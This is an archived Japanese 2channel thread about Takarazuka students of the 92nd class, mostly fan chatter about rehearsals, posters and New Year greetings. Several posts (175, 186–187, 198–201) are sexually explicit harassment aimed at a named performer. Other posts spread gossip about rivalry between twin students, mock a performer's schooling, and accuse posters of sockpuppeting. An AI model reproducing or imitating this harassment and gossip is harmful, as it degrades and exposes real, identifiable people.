147 :名無しさん@花束いっぱい。:2006/12/27(水) 10:53:00 ID:MX7yDj75
蘭乃はもはや別格の扱い!雑魚は観念しろ。

148 :名無しさん@花束いっぱい。:2006/12/27(水) 12:24:12 ID:qQzuaNKp
>>141おおむちゃん でしょう?!

149 :名無しさん@花束いっぱい。:2006/12/27(水) 15:50:39 ID:TE3lVfQG
蘭乃さん稽古場風景すごい映ってるね
なんか立ち居地すごいよくない??

150 :名無しさん@花束いっぱい。:2006/12/27(水) 21:08:34 ID:UyUOii1w

これ、本人が書いてるの?


151 :名無しさん@花束いっぱい。:2006/12/27(水) 21:19:02 ID:CaqpddBH
今日おやすみだしね

152 :名無しさん@花束いっぱい。:2006/12/27(水) 23:27:15 ID:7JOr163k
阪急のHP見ました。蘭乃さんってすごいよね。


153 :名無しさん@花束いっぱい。:2006/12/27(水) 23:42:32 ID:PUHbsikB
この双子、時〜ぃ々ここに現れて自分たちを絶賛して去っていくよねw

154 :名無しさん@花束いっぱい。:2006/12/28(木) 07:39:20 ID:dTb4dlw0
最近このスレ雰囲気悪くない?!
ちょっと話題になると、すぐに本人だの宗教だのと・・。

155 :名無しさん@花束いっぱい。:2006/12/29(金) 00:50:25 ID:r4yUBpun
大変だけどお稽古ガンガレ〜

156 :名無しさん@花束いっぱい。:2006/12/29(金) 18:58:13 ID:r4yUBpun
今日で今年も後3日

157 :名無しさん@花束いっぱい。:2006/12/29(金) 21:50:25 ID:ae6sHeHr
蘭ちゃん阪急のポスター
赤い振袖で可愛いね。
おめでとう!!

158 :名無しさん@花束いっぱい。:2006/12/30(土) 22:53:04 ID:ZQAvJLv/

また本人出てきたよ!
呆れてものも言えない・・・。
ずいぶんとしつこいネッ
この愚かさを皆に知ってもらうためageようじゃないか。

159 :名無しさん@花束いっぱい。:2006/12/31(日) 00:56:35 ID:vQjMGmCe
双子ちゃんそんなヒマ人じゃないしっ笑


160 :名無しさん@花束いっぱい。:2006/12/31(日) 10:01:45 ID:QHlxt6J8
双子の片割れが、やっぱ複雑なんじゃないの?ママンは蘭命みたいだしさ。

161 :名無しさん@花束いっぱい。:2006/12/31(日) 10:22:57 ID:RkoQHmwS
双子の母は麗命だよ。だけど出てきたのは蘭。

162 :名無しさん@花束いっぱい。:2006/12/31(日) 19:31:36 ID:suqxAvsb
だから、もめてるのか。
姉妹そろってしかも双子で入ることができたのに、
仲よくできない姉妹だなんて悲しいね。

163 :名無しさん@花束いっぱい。:2007/01/01(月) 02:14:13 ID:JylKDf2g
雪のMyご贔屓様♪
今年も頑張って下さいっ!応援しています。

164 :名無しさん@花束いっぱい。:2007/01/01(月) 12:46:33 ID:bU6yorA9
蘭乃が頑張るわよ!

165 :名無しさん@花束いっぱい。:2007/01/02(火) 00:52:25 ID:oFAbp+7g
年賀状ありがとうございます♪
雪の男役のご贔屓様、バウお稽古大変だけど今年も頑張ってください☆


166 :名無しさん@花束いっぱい。:2007/01/02(火) 15:23:28 ID:l6eB4Lh5
蘭乃はなちゃんが今年も頑張るわよ!!

167 :名無しさん@花束いっぱい。:2007/01/02(火) 16:58:28 ID:4BzusGuq
阪急のポスターすごく素敵でした。今年も頑張ってください。

168 :名無しさん@花束いっぱい。:2007/01/02(火) 19:55:16 ID:sAkJVNWR
1月1日のBS放送のネバセイでフィナーレの階段降りで段を踏み外してた方のお名前分かりますか?
気になったもので…

169 :名無しさん@花束いっぱい。:2007/01/03(水) 11:37:33 ID:eBfbjZth
誰でしょうか?
私も気になる

170 :名無しさん@花束いっぱい。:2007/01/03(水) 14:46:39 ID:5k4hJZ0A
2007年も人の不幸を喜ぶ基地外が早速登場だね!
>>168は、誰の名前が書かれたら気がすむんだろうね?!
あなたが階段から落ちたら?


171 :名無しさん@花束いっぱい。:2007/01/04(木) 08:51:14 ID:DHrwCBxf
2007年 お稽古は!

1/4からです。

本年もどうぞ宜しくお願い致しますm(__)m


172 :名無しさん@花束いっぱい。:2007/01/04(木) 10:14:02 ID:f1LA7nCd
階段から落ちたのは、すみれの麗。

173 :名無しさん@花束いっぱい。:2007/01/04(木) 12:39:17 ID:LOcbRmuH
私のご贔屓は1/3からお稽古みたい!!

174 :名無しさん@花束いっぱい。:2007/01/04(木) 13:13:41 ID:f1LA7nCd
しつこいな。>>173!

名無しさん@花束いっぱい。:2007/01/01(月) 02:14:13 ID:JylKDf2g
雪のMyご贔屓様♪
今年も頑張って下さいっ!応援しています

名無しさん@花束いっぱい。:2007/01/02(火) 00:52:25 ID:oFAbp+7g
年賀状ありがとうございます♪
雪の男役のご贔屓様、バウお稽古大変だけど今年も頑張ってください☆

名無しさん@花束いっぱい。:2007/01/04(木) 12:39:17 ID:LOcbRmuH
私のご贔屓は1/3からお稽古みたい!!

全て同一人物。


175 :名無しさん@花束いっぱい。:2007/01/04(木) 13:16:58 ID:f1LA7nCd


神房いつまで待たせるの。
ああもういや
申房たまらず、おちんち触る。



176 :名無しさん@花束いっぱい。:2007/01/04(木) 23:13:51 ID:W3c9nqqY
雪組男から年賀状来た
やばいくらい格好良い



177 :名無しさん@花束いっぱい。:2007/01/05(金) 00:55:11 ID:ayo3dJG0
れれれの麗だったのか!

178 :名無しさん@花束いっぱい。:2007/01/05(金) 01:38:38 ID:ydfAshOU
>>176
誰?誰?
ヒント〜!

179 :名無しさん@花束いっぱい。:2007/01/05(金) 03:12:17 ID:HXYACI/g
174>
165、173デス
その前のは知らない、勝手に同一と決めつけるのやめてくれませんか?不愉快です。


180 :名無しさん@花束いっぱい。:2007/01/05(金) 07:02:54 ID:5/m4i5iJ
178
中卒の男役だよ
目がキリッとしている方

181 :名無しさん@花束いっぱい。:2007/01/05(金) 09:03:33 ID:tB9BzciL
178
中退の男役だよ
成績悪いけど雪で一番人気の。

182 :名無しさん@花束いっぱい。:2007/01/05(金) 17:16:08 ID:Uu30PCU6
剣崎さんかあ!

183 :名無しさん@花束いっぱい。:2007/01/05(金) 17:21:08 ID:cC8IFZ8x
いいかげん成績で差別するのやめようよ。成績悪くたって出てくる子の勢いは止められない

184 :名無しさん@花束いっぱい。:2007/01/05(金) 20:11:45 ID:HXYACI/g
180>同じ人からかも、漏れもきまつた〜

185 :名無しさん@花束いっぱい。:2007/01/06(土) 03:21:19 ID:Uzssd9iV
ネ申房たまらず女役に転向

186 :名無しさん@花束いっぱい。:2007/01/06(土) 13:10:10 ID:qQeSNSEQ
剣崎とやらは、成績悪くてバカにされてるの?

神房はやくして
申房たまらず、おっぱい触る。

おちんち舐める。

早くちょうだいよ!!

187 :名無しさん@花束いっぱい。:2007/01/06(土) 13:11:12 ID:qQeSNSEQ
神房はやくして

あなたが欲しい。。

188 :名無しさん@花束いっぱい。:2007/01/06(土) 15:02:53 ID:E9l6XNaL
えーっと。
92期について語るスレ????

内容低い連中やな〜

189 :名無しさん@花束いっぱい。:2007/01/06(土) 18:37:54 ID:793Gug3n
つか…なぜこんな下らない内容…ハロダンお稽古情報とかお稽古入り出とかの話を聞きたい…

190 :名無しさん@花束いっぱい。:2007/01/06(土) 18:50:49 ID:WD9URMvg
てか…、ここに書かれてる神房て何?
今までの中で一番低レベルな書き込みじゃない?
92とは関係ないように思えるが…何?

191 :名無しさん@花束いっぱい。:2007/01/06(土) 20:03:03 ID:8IAFqv3l
つ 神房佳希君

192 :名無しさん@花束いっぱい。:2007/01/07(日) 00:47:27 ID:a9zAQyiP

1番好き、92期!!
とかこじつけてみまつた

193 :名無しさん@花束いっぱい。:2007/01/07(日) 01:57:20 ID:5VJvmvDy
今や2ちゃんで神房タソを知らない香具師はモグリ


194 :名無しさん@花束いっぱい。:2007/01/07(日) 02:08:12 ID:ikl/i6so
神房さんも変なのに取り憑かれてかわいそうに・・・。
うちの贔屓男役もアンチは居るけどこーゆーのはまだ居ない。

195 :名無しさん@花束いっぱい。:2007/01/07(日) 11:48:47 ID:GsXfIrJ5
変なのにとり憑かれてるの?!
ファンの子が変なんじゃなくて?
なんかすごい妄想的なカキコにみえるけど。
神房さんの名前書いたカキコも時々ふっと現れるから、おそらく一人の人がカキコしてんのかと思ってたわ。

196 :名無しさん@花束いっぱい。:2007/01/07(日) 19:15:16 ID:hZIsy0h1
週末、やっとキャトルに行ける。堕天使の涙/タランテラ!のDVD買ってくる。
公演未見だが、92期の子が確認できる(誰がどこにいるか)場面はありますか?

197 :名無しさん@花束いっぱい。:2007/01/08(月) 02:17:37 ID:YnL7rdhb
同じレベルにおもわれたんじゃ神房たまらない


198 :名無しさん@花束いっぱい。:2007/01/08(月) 11:09:19 ID:F9JXComE
神房タマラナソ
神房はやく、はやくしてえ
たまたなく今度は、おちんち掻きまくる。

あなたに入れてほしーの!


199 :名無しさん@花束いっぱい。:2007/01/08(月) 11:10:28 ID:F9JXComE
神房タマラナソ

神房のげんこつをいれて

200 :名無しさん@花束いっぱい。:2007/01/08(月) 11:14:12 ID:F9JXComE
神房のげんこつをいれて オナニーしたいよ。

201 :名無しさん@花束いっぱい。:2007/01/09(火) 11:10:05 ID:FNPV2/k7
神房たまらないよ
あなたが恋しい
違う人のおちんち触るよ

202 :名無しさん@花束いっぱい。:2007/01/09(火) 17:35:30 ID:LKBhovIZ
>>195
明らかにアンチでしょ。
カキコも一人だと思うよ。
受験スクールで同時期に受けて落ちちゃった子とかさ。




203 :名無しさん@花束いっぱい。:2007/01/11(木) 02:09:27 ID:8LyfcjwU
公演の話にしてよ。

38 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)